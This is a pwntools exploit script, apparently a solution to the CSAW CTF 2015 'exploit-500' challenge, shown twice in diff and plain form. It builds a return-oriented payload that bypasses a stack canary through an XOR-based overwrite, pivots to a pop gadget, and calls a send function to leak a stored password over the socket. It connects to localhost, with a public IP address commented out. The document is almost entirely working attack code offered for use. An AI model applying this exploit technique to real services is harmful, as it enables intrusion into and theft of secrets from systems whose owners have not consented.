vanhoefm · September 21, 2015 02:24
diff --git a/csaw-ctf-2015_exploit-500.py b/csaw-ctf-2015_exploit-500.py
 #!/usr/bin/env python2
 from pwn import *


 # Stack layout of vulnerable functions:
 #
 #	[   buffer of some length  ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
 #

 payload  = pack(0x08048740)			# send function -> send(socket, &password, 0x100, 0)
 						#   will call func_72, with buffer of 0x84 bytes
 payload += pack(0)				# next ROP chain
 payload += pack(4)				# socket file descriptor
 payload += pack(0x0805F0C0)			# address of password
 payload += pack(0x100)				# length of password
 payload += pack(0)				# flags for read call
 payload += pack(0) * ((0x84-len(payload)) / 4)	# padding so we can now overwrite variables

 log.info("Constructed stack frame of 0x%x bytes" % len(payload))


 # stack layout when entering function:
 #
 #	[return-addr][buffer][size-read][???][???][???][???][bytes_read][buffer-data]
 #
 #	0xffffd63c:	0x08056afa	0xffffd65c	0x00000030	0x00000100
 #	0xffffd64c:	0x00000000	0xf7ffda54	0x00000001	0x00000030
 #	0xffffd65c:	0x08048740	0x00000000	0x00000004	0x0805F0C0
 #

 payload += pack(0) * 4				# skip canary, align, and saved-ebp
 payload += pack(0x8056AFA ^ 0x80578F5)		# let XOR write address of ROP gadget "7-pop; ret"
 payload += pack(0)				# ignore buffer pointer
 payload += pack((len(payload) + 4 - 1) ^ 1)	# overwrite counter variable for early stop

 r = remote('localhost', 24242)
 #r = remote('54.152.37.20', 24242)
 log.info("Sending {} bytes payload: {}".format(len(payload), repr(payload)))
 r.send(payload)
 r.interactive()
	#!/usr/bin/env python2
	from pwn import *


	# Stack layout of vulnerable functions:
	#
	# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
	#

	payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
	# will call func_72, with buffer of 0x84 bytes
	payload += pack(0) # next ROP chain
	payload += pack(4) # socket file descriptor
	payload += pack(0x0805F0C0) # address of password
	payload += pack(0x100) # length of password
	payload += pack(0) # flags for read call
	payload += pack(0) * ((0x84-len(payload)) / 4) # padding so we can now overwrite variables

	log.info("Constructed stack frame of 0x%x bytes" % len(payload))


	# stack layout when entering function:
	#
	# [return-addr][buffer][size-read][???][???][???][???][bytes_read][buffer-data]
	#
	# 0xffffd63c: 0x08056afa 0xffffd65c 0x00000030 0x00000100
	# 0xffffd64c: 0x00000000 0xf7ffda54 0x00000001 0x00000030
	# 0xffffd65c: 0x08048740 0x00000000 0x00000004 0x0805F0C0
	#

	payload += pack(0) * 4 # skip canary, align, and saved-ebp
	payload += pack(0x8056AFA ^ 0x80578F5) # let XOR write address of ROP gadget "7-pop; ret"
	payload += pack(0) # ignore buffer pointer
	payload += pack((len(payload) + 4 - 1) ^ 1) # overwrite counter variable for early stop

	r = remote('localhost', 24242)
	#r = remote('54.152.37.20', 24242)
	log.info("Sending {} bytes payload: {}".format(len(payload), repr(payload)))
	r.send(payload)
	r.interactive()